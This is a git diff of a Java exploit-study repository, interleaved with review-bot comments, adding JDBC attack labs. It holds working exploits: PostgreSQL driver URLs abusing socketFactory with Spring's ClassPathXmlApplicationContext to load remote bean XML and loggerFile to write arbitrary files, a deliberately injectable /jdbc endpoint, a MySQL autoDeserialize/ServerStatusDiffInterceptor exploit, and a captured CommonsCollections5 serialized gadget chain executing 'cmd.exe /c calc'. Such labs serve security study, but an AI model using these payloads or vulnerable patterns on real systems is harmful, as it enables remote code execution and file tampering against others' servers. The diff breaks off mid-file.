diff --git a/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java new file mode 100644 index 0000000..44d6f2d --- /dev/null +++ b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java @@ -0,0 +1,4 @@ +package com.read; + +public class FileRead { +} diff --git a/CodeAudit/BasicVulStudy/FileWRD/test.txt b/CodeAudit/BasicVulStudy/FileWRD/test.txt new file mode 100644 index 0000000..e69de29 diff --git a/JNDI/JNDI_vul/.gitignore b/JDBC/PostgreSql/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.gitignore rename to JDBC/PostgreSql/.gitignore diff --git a/JNDI/JNDI_vul/.idea/.gitignore b/JDBC/PostgreSql/.idea/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.idea/.gitignore rename to JDBC/PostgreSql/.idea/.gitignore diff --git a/hessian/HessianStudy/.idea/encodings.xml b/JDBC/PostgreSql/.idea/encodings.xml similarity index 100% rename from hessian/HessianStudy/.idea/encodings.xml rename to JDBC/PostgreSql/.idea/encodings.xml diff --git a/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..4df5f76 --- /dev/null +++ b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,8 @@ + + + + \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/misc.xml b/JDBC/PostgreSql/.idea/misc.xml similarity index 84% rename from hessian/HessianStudy/.idea/misc.xml rename to JDBC/PostgreSql/.idea/misc.xml index 556467a..d23f859 100644 --- a/hessian/HessianStudy/.idea/misc.xml +++ b/JDBC/PostgreSql/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/vcs.xml b/JDBC/PostgreSql/.idea/vcs.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/vcs.xml rename to JDBC/PostgreSql/.idea/vcs.xml 
diff --git a/JDBC/PostgreSql/ascii.jar b/JDBC/PostgreSql/ascii.jar new file mode 100644 index 0000000..7561305 Binary files /dev/null and b/JDBC/PostgreSql/ascii.jar differ diff --git a/JDBC/PostgreSql/log.txt b/JDBC/PostgreSql/log.txt new file mode 100644 index 0000000..2d34e22 --- /dev/null +++ b/JDBC/PostgreSql/log.txt @@ -0,0 +1,10 @@ +九月 25, 2025 1:01:07 下午 org.postgresql.Driver connect +详细: Connecting with URL: jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection +详细: PostgreSQL JDBC Driver 42.3.0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setDefaultFetchSize +详细: setDefaultFetchSize = 0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setPrepareThreshold +详细: setPrepareThreshold = 5 +九月 25, 2025 1:11:18 下午 org.postgresql.core.v3.ConnectionFactoryImpl openConnectionImpl +详细: Trying to establish a protocol version 3 connection to FileWrite:5432 diff --git a/JDBC/PostgreSql/origin.jar b/JDBC/PostgreSql/origin.jar new file mode 100644 index 0000000..86bf5fb Binary files /dev/null and b/JDBC/PostgreSql/origin.jar differ diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml new file mode 100644 index 0000000..428bb21 --- /dev/null +++ b/JDBC/PostgreSql/pom.xml @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + PostgreSql + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.13 + + + org.postgresql + postgresql + 42.3.1 + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java new file mode 100644 index 0000000..a62fbd2 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java 
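Review bot: The `org.postgresql:postgresql` pin at `42.3.1` in the dependencies block predates the fixes for the URL-property abuses (`socketFactory`/`socketFactoryArg` class instantiation, `loggerFile` write) that `exp/FileWrite.java` and `exp/SocketFactory.java` in this same commit rely on, and nothing in the pom says the old version is deliberate — a scanner or a well-meaning bump will silently break the lab. Mark it in place: `<!-- intentionally vulnerable: CVE-2022-21724 class-instantiation / loggerFile write - do not bump -->` directly above the `42.3.1` version element. If `spring-boot-starter-web 2.7.13` is only there so that `org.springframework.context.support.ClassPathXmlApplicationContext` (named in every socketFactory URL) is on the classpath, a one-line comment saying so would save the next reader a guess.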
@@ -0,0 +1,17 @@ +package com.test; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +public class DirectConnect { + public static void main(String[] args) throws SQLException { + Driver driver = new Driver(); + String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=D:/log.txt"; + String url3 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/postgre_origin.jar!/1.xml"; + String url4 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + driver.connect(url3, null); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java new file mode 100644 index 0000000..7edaef0 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java @@ -0,0 +1,11 @@ +package com.test; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class StartApplication { + public static void main(String[] args) { + SpringApplication.run(StartApplication.class, args); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java new file mode 100644 index 0000000..e0c0cde --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java 
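Review bot: Four of the five URL locals in `DirectConnect.main` (`url`, `url1`, `url2`, `url4`) are dead, and nothing states what each variant demonstrates, so the `http:` / `file:` / `jar:file:` distinction is only visible by reading the query strings. Since these lines are the menu of vectors the lab exercises, annotate each one, e.g. `// socketFactory=<any class with a String ctor>: ClassPathXmlApplicationContext parses socketFactoryArg as Spring bean XML (remote http)` on `url`, with `(local file)` and `(XML inside a local jar)` on `url4`/`url3`, and `// loggerLevel+loggerFile: driver writes its debug log to an attacker-chosen path` on `url2`. I cannot tell from here what `url1` (a plain connect to 127.0.0.1:7777) is for; say so in a comment or drop it. `driver.connect` also returns a `Connection` that is never closed — the factory instantiation presumably fails before one exists, but `try (Connection ignored = driver.connect(url3, null)) { }` plus a `java.sql.Connection` import costs nothing.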
@@ -0,0 +1,16 @@ +package com.test; + +import ch.qos.logback.core.util.FileUtil; + +import java.io.IOException; +import java.net.URLEncoder; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class UrlEncodeFile { + public static void main(String[] args) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get("./ascii.jar")); + String encode = URLEncoder.encode(new String(bytes), "utf-8"); + System.out.println(encode); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java new file mode 100644 index 0000000..f19a25a --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java @@ -0,0 +1,28 @@ +package com.test.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.ResponseBody; + +import java.io.PrintWriter; +import java.io.StringWriter; +import java.sql.DriverManager; + +@Controller +public class IndexController { + + @ResponseBody + @RequestMapping("/jdbc") + public String jdbc(String url) { + try { + DriverManager.getConnection(url); + + } catch (Exception e) { + StringWriter sw = new StringWriter(); + e.printStackTrace(new PrintWriter(sw)); + return sw.toString(); + } + return "done."; + } + +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java new file mode 100644 index 0000000..ca86bc7 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java 
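Review bot: `new String(bytes)` on the `encode` line decodes the jar with the platform default charset, so any byte above 0x7F is silently replaced and the percent-encoded output no longer describes the file on disk; the name `ascii.jar` suggests the input is deliberately kept 7-bit, but nothing enforces or states that. Make the assumption explicit and loud: `for (byte b : bytes) if (b < 0) throw new IllegalArgumentException("ascii.jar must be 7-bit ASCII");` before the decode, then `new String(bytes, StandardCharsets.US_ASCII)` (with a `java.nio.charset.StandardCharsets` import), and a comment `// payload is pasted into the /jdbc?url= query string; only 7-bit content survives the container's parameter decoding` — whether non-ASCII would survive depends on how the servlet container decodes the parameter, so confirm before relaxing the check. The unused `ch.qos.logback.core.util.FileUtil` import drags in a transitive dependency for nothing and should be removed.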
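Review bot: `IndexController.jdbc(String url)` passes a caller-supplied `url` straight to `DriverManager.getConnection`, which is the intended vulnerable sink of this lab, but nothing in the class says so and the pattern is one line away from being copied into real code — put `// INTENTIONALLY VULNERABLE: attacker-controlled JDBC URL reaches DriverManager (JDBC URL injection target); never deploy` above the `@RequestMapping("/jdbc")`. The catch block also returns the full stack trace to the HTTP client, which is useful feedback for the exercise but is information disclosure anywhere else; record that in the same comment rather than changing it. On success the `Connection` is leaked; `try (Connection ignored = DriverManager.getConnection(url)) { }` with a `java.sql.Connection` import closes it and leaves the observable behaviour unchanged.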
@@ -0,0 +1,17 @@ +package com.test.exp; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +// CVE-2022-21724 +// 写入的文件前后会有其他字符 +public class FileWrite { + public static void main(String[] args) throws SQLException { + String file = "file content"; + Driver driver = new Driver(); + String url1 = "jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=D:/log.txt&{{file}}"; + String replace = url1.replace("{{file}}", file); + driver.connect(replace, null); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java new file mode 100644 index 0000000..8d153fa --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java @@ -0,0 +1,16 @@ +package com.test.exp; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +// 本质是调用构造方法 +public class SocketFactory { + public static void main(String[] args) throws SQLException { + String url1 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url2 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + String url3 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/1.jar!/1.xml"; + Driver driver = new Driver(); + driver.connect(url1, null); + } +} diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml new file mode 100644 index 0000000..54b155f --- /dev/null +++ b/JDBC/PostgreSql/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8081 \ No newline at end of file diff --git a/JDBC/mysql/.gitignore b/JDBC/mysql/.gitignore new file mode 100644 index 0000000..f68d109 --- /dev/null +++ b/JDBC/mysql/.gitignore 
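Review bot: The header comment `// 写入的文件前后会有其他字符` undersells what the committed `log.txt` shows: the content that lands in `loggerFile` is the driver's java.util.logging FINE record — a timestamp/source header line followed by `Connecting with URL: jdbc:postgresql://...` — and the payload is simply the tail of that raw URL, so whatever replaces `{{file}}` is written verbatim, not URL-decoded. Replace the comment with an English one that says exactly that, e.g. `// loggerLevel=DEBUG + loggerFile make the driver log the raw connect URL to an attacker-chosen path; the payload is the URL tail, wrapped in the JUL record header/footer`. The `// CVE-2022-21724` tag is, I believe, the socketFactory/sslfactory class-instantiation issue, while the loggerFile write was tracked separately as CVE-2022-26520 — worth confirming before the ID is cited. Note also that a `&` or `=` inside `file` changes how the driver tokenises the query string; that does not alter the logged URL, but it may make URL parsing fail before the logger is configured, so either keep the payload free of those characters or document the constraint.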
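Review bot: The only explanation in `SocketFactory.java` is the Chinese `// 本质是调用构造方法`, and `url2`/`url3` are dead locals, so a reader outside the author's language gets neither the mechanism nor the reason three URLs exist. Expand the header into English and tie it to the URLs: `// socketFactory is instantiated reflectively with socketFactoryArg as its single String ctor argument, so any class with a (String) constructor is reachable; ClassPathXmlApplicationContext then loads the argument as Spring bean XML from http:, file: or jar:file:`. The three URL lines then only need `// remote` / `// local file` / `// inside a local jar` suffixes.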
@@ -0,0 +1,29 @@ +### IntelliJ IDEA ### +out/ +!**/src/main/**/out/ +!**/src/test/**/out/ + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache +bin/ +!**/src/main/**/bin/ +!**/src/test/**/bin/ + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/.gitignore b/JDBC/mysql/.idea/.gitignore similarity index 100% rename from hessian/HessianStudy/.idea/.gitignore rename to JDBC/mysql/.idea/.gitignore diff --git a/JDBC/mysql/.idea/compiler.xml b/JDBC/mysql/.idea/compiler.xml new file mode 100644 index 0000000..51e1d07 --- /dev/null +++ b/JDBC/mysql/.idea/compiler.xml @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/encodings.xml b/JDBC/mysql/.idea/encodings.xml new file mode 100644 index 0000000..29cf8bf --- /dev/null +++ b/JDBC/mysql/.idea/encodings.xml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/jarRepositories.xml b/JDBC/mysql/.idea/jarRepositories.xml new file mode 100644 index 0000000..c364a09 --- /dev/null +++ b/JDBC/mysql/.idea/jarRepositories.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/misc.xml b/JDBC/mysql/.idea/misc.xml new file mode 100644 index 0000000..fa904e2 --- /dev/null +++ b/JDBC/mysql/.idea/misc.xml @@ -0,0 +1,15 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/modules.xml b/JDBC/mysql/.idea/modules.xml new file mode 100644 index 0000000..be9deab --- /dev/null +++ b/JDBC/mysql/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/vcs.xml b/JDBC/mysql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/mysql/.idea/vcs.xml 
@@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/pom.xml b/JDBC/mysql/SpringTarget/pom.xml new file mode 100644 index 0000000..6f5daac --- /dev/null +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -0,0 +1,25 @@ + + + 4.0.0 + + com.test + SpringTarget + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml new file mode 100644 index 0000000..be88d37 --- /dev/null +++ b/JDBC/mysql/SpringTarget/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8085 \ No newline at end of file diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin new file mode 100644 index 0000000..4bb9518 Binary files /dev/null and b/JDBC/mysql/YsoserialGadgetGenerate.bin differ diff --git a/JDBC/mysql/cc5.pcap b/JDBC/mysql/cc5.pcap new file mode 100644 index 0000000..854499a Binary files /dev/null and b/JDBC/mysql/cc5.pcap differ diff --git a/JDBC/mysql/final.pcap b/JDBC/mysql/final.pcap new file mode 100644 index 0000000..745f674 --- /dev/null +++ b/JDBC/mysql/final.pcap 
@@ -0,0 +1,16 @@ +J... +5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password......................def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +detailMessaget..Ljava/lang/String;[. +stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. +lineNumberL..declaringClassq.~..L..fileNameq.~..L. +methodNameq.~..xp...Dt./me.l0tus.ysoserial.payloads.CommonsCollections5t..CommonsCollections5.javat. getObjectsq.~.....0q.~. +q.~..q.~..sq.~......t..ysoserial.gui.YsoForm$1t..YsoForm.javat..actionPerformedsq.~......t..javax.swing.AbstractButtont..AbstractButton.javat..fireActionPerformedsq.~.... ,t."javax.swing.AbstractButton$Handlerq.~..q.~..sq.~......t..javax.swing.DefaultButtonModelt..DefaultButtonModel.javaq.~..sq.~......q.~..q.~..t. +setPressedsq.~......t.*javax.swing.plaf.basic.BasicButtonListenert..BasicButtonListener.javat. +mouseReleasedsq.~......t..java.awt.Componentt..Component.javat..processMouseEventsq.~......t..javax.swing.JComponentt..JComponent.javaq.~.'sq.~......q.~.%q.~.&t..processEventsq.~......t..java.awt.Containert..Container.javaq.~.,sq.~......q.~.%q.~.&t..dispatchEventImplsq.~......q.~..q.~./q.~.1sq.~.....gq.~.%q.~.&t. +dispatchEventsq.~.....(t..java.awt.LightweightDispatcherq.~./t..retargetMouseEventsq.~......q.~.6q.~./q.~.'sq.~.....|q.~.6q.~./q.~.4sq.~......q.~..q.~./q.~.1sq.~.... +.t..java.awt.Windowt..Window.javaq.~.1sq.~.....gq.~.%q.~.&q.~.4sq.~......t..java.awt.EventQueuet..EventQueue.javaq.~.1sq.~.....aq.~.@q.~.At. 
+access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.Fsq.~......t..java.security.AccessControllert..AccessController.javat..doPrivilegedsq.~.....Jt.5java.security.ProtectionDomain$JavaSecurityAccessImplt..ProtectionDomain.javat..doIntersectionPrivilegesq.~.....Tq.~.Mq.~.Nq.~.Osq.~......t..java.awt.EventQueue$4q.~.Aq.~.Fsq.~......q.~.Rq.~.Aq.~.Fsq.~......q.~.Iq.~.Jq.~.Ksq.~.....Jq.~.Mq.~.Nq.~.Osq.~......q.~.@q.~.Aq.~.4sq.~......t..java.awt.EventDispatchThreadt..EventDispatchThread.javat..pumpOneEventForFilterssq.~.....tq.~.Xq.~.Yt..pumpEventsForFiltersq.~.....iq.~.Xq.~.Yt..pumpEventsForHierarchysq.~.....eq.~.Xq.~.Yt. +pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. +iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. +getRuntimeur..[Ljava.lang.Class;......Z....xp....t. 
getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. +loadFactorI. thresholdxp?@......w.........xx......."... \ No newline at end of file diff --git a/JDBC/mysql/hex.bin b/JDBC/mysql/hex.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap new file mode 100644 index 0000000..fea6256 Binary files /dev/null and b/JDBC/mysql/hex.pcap differ diff --git a/JDBC/mysql/hex1.bin b/JDBC/mysql/hex1.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex1.pcap b/JDBC/mysql/hex1.pcap new file mode 100644 index 0000000..4bb9518 Binary files /dev/null and b/JDBC/mysql/hex1.pcap differ diff --git a/JDBC/mysql/mysql.iml b/JDBC/mysql/mysql.iml new file mode 100644 index 0000000..c90834f --- /dev/null +++ b/JDBC/mysql/mysql.iml @@ -0,0 +1,11 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/mysql.pcap b/JDBC/mysql/mysql.pcap new file mode 100644 index 0000000..ba88bb9 Binary files /dev/null and b/JDBC/mysql/mysql.pcap differ diff --git a/hessian/dubbo/pom.xml b/JDBC/mysql/no-outbound/pom.xml similarity index 66% rename from hessian/dubbo/pom.xml rename to JDBC/mysql/no-outbound/pom.xml index 620f038..136d7a3 100644 --- a/hessian/dubbo/pom.xml +++ b/JDBC/mysql/no-outbound/pom.xml @@ -4,8 +4,8 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - org.example - dubbo + com.test + no-outbound 1.0-SNAPSHOT @@ -16,14 +16,15 @@ - com.caucho - hessian - 4.0.63 + mysql + mysql-connector-java + 5.1.47 - org.apache.dubbo - dubbo - 2.7.6 + commons-collections + commons-collections + 3.2.1 + \ No newline at end of file 
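Review bot: Both new pins in the renamed `no-outbound/pom.xml` — `mysql-connector-java 5.1.47` and `commons-collections 3.2.1` — are chosen because they are exploitable (the 5.1.x `autoDeserialize`/`ServerStatusDiffInterceptor` path used by `exp/Exp.java`, and the `InvokerTransformer`/`LazyMap` chain visible in the committed `final.pcap`), yet the pom carries no comment saying so. Add `<!-- intentionally vulnerable: CommonsCollections gadget chain (ysoserial CC5) - do not upgrade -->` beside commons-collections and `<!-- 5.1.x: autoDeserialize + statementInterceptors reachable from the JDBC URL -->` beside the connector, so automated version bumps are not accepted blindly. The leftover `dubbo`-era coordinates were correctly replaced with `com.test:no-outbound`; nothing else in the hunk needs attention.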
diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java new file mode 100644 index 0000000..11cf983 --- /dev/null +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -0,0 +1,20 @@ +package exp; + +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.SQLException; + +public class Exp { + public static void main(String[] args) throws SQLException { + String url = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root"; + String noOutBound = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root&socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=hex.pcap"; + String username = "root"; + String password = "root"; + try (Connection connection = DriverManager.getConnection(noOutBound, username, password)) { + System.out.println("数据库连接成功!"); + } catch (SQLException e) { + System.out.println("数据库连接失败!"); + e.printStackTrace(); + } + } +} diff --git a/JDBC/mysql/no-outbound/target/classes/exp/Exp.class b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class new file mode 100644 index 0000000..dbd3edc Binary files /dev/null and b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class differ diff --git a/JNDI/JNDI/.idea/copilot.data.migration.agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file 
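Review bot: `namedPipePath=hex.pcap` in `noOutBound` is a relative path, so the whole "no outbound connection" demonstration only works when the JVM's working directory is `JDBC/mysql` where `hex.pcap` is committed; splice `Paths.get("hex.pcap").toAbsolutePath()` into the URL (or take the path from `args`) to make the run reproducible. The mechanism is the point of the module and deserves a comment — presumably `NamedPipeSocketFactory` opens the given file as the transport so a pre-recorded MySQL handshake plus serialized gadget replaces a live rogue server: `// no-outbound: the driver reads the recorded server stream (hex.pcap) through NamedPipeSocketFactory instead of a socket, so no listener is needed`. `url` is dead, and `user`/`password` appear both in the URL and as explicit `getConnection` arguments; keep only the explicit form, which also keeps credentials out of anything that logs the URL.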
diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.edit.xml b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/misc.xml b/JNDI/JNDI/.idea/misc.xml index 8345e46..805d844 100644 --- a/JNDI/JNDI/.idea/misc.xml +++ b/JNDI/JNDI/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/uiDesigner.xml b/JNDI/JNDI/.idea/uiDesigner.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/uiDesigner.xml rename to JNDI/JNDI/.idea/uiDesigner.xml diff --git a/JNDI/JNDI/.idea/vcs.xml b/JNDI/JNDI/.idea/vcs.xml index b2bdec2..64713b8 100644 --- a/JNDI/JNDI/.idea/vcs.xml +++ b/JNDI/JNDI/.idea/vcs.xml @@ -2,5 +2,6 @@ + \ No newline at end of file diff --git a/JNDI/JNDI/ClassByteGen/AAAA.class b/JNDI/JNDI/ClassByteGen/AAAA.class new file mode 100644 index 0000000..0a0e726 Binary files /dev/null and b/JNDI/JNDI/ClassByteGen/AAAA.class differ diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy0.class b/JNDI/JNDI/com/sun/proxy/$Proxy0.class new file mode 100644 index 0000000..8592ed3 Binary files /dev/null and b/JNDI/JNDI/com/sun/proxy/$Proxy0.class differ diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy1.class b/JNDI/JNDI/com/sun/proxy/$Proxy1.class new file mode 100644 index 0000000..258a627 Binary files /dev/null and b/JNDI/JNDI/com/sun/proxy/$Proxy1.class differ diff --git a/JNDI/JNDI/pom.xml b/JNDI/JNDI/pom.xml index fa7063a..1a7687f 100644 --- a/JNDI/JNDI/pom.xml +++ b/JNDI/JNDI/pom.xml 
@@ -4,7 +4,7 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - com.example + com.test JNDI 1.0-SNAPSHOT @@ -14,12 +14,47 @@ UTF-8 - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - - + + + com.alibaba + fastjson + 1.2.47 + + + org.javassist + javassist + 3.30.2-GA + + + org.slf4j + slf4j-api + 2.0.17 + + + org.apache.tomcat.embed + tomcat-embed-core + 9.0.38 + + + com.h2database + h2 + 2.3.232 + + + org.hsqldb + hsqldb + 2.7.3 + + + com.alibaba + druid + 1.2.23 + + + com.unboundid + unboundid-ldapsdk + 3.2.0 + + \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java b/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java deleted file mode 100644 index 4118c5a..0000000 --- a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java +++ /dev/null @@ -1,36 +0,0 @@ -package JNDI_Develop; - -import javax.naming.Context; -import javax.naming.NamingException; -import javax.naming.directory.Attributes; -import javax.naming.directory.DirContext; -import javax.naming.directory.InitialDirContext; -import java.util.Hashtable; - - -public class DNSContextFactoryTest { - public static void main(String[] args) { - // 创建环境变量对象 - Hashtable env = new Hashtable(); - - // 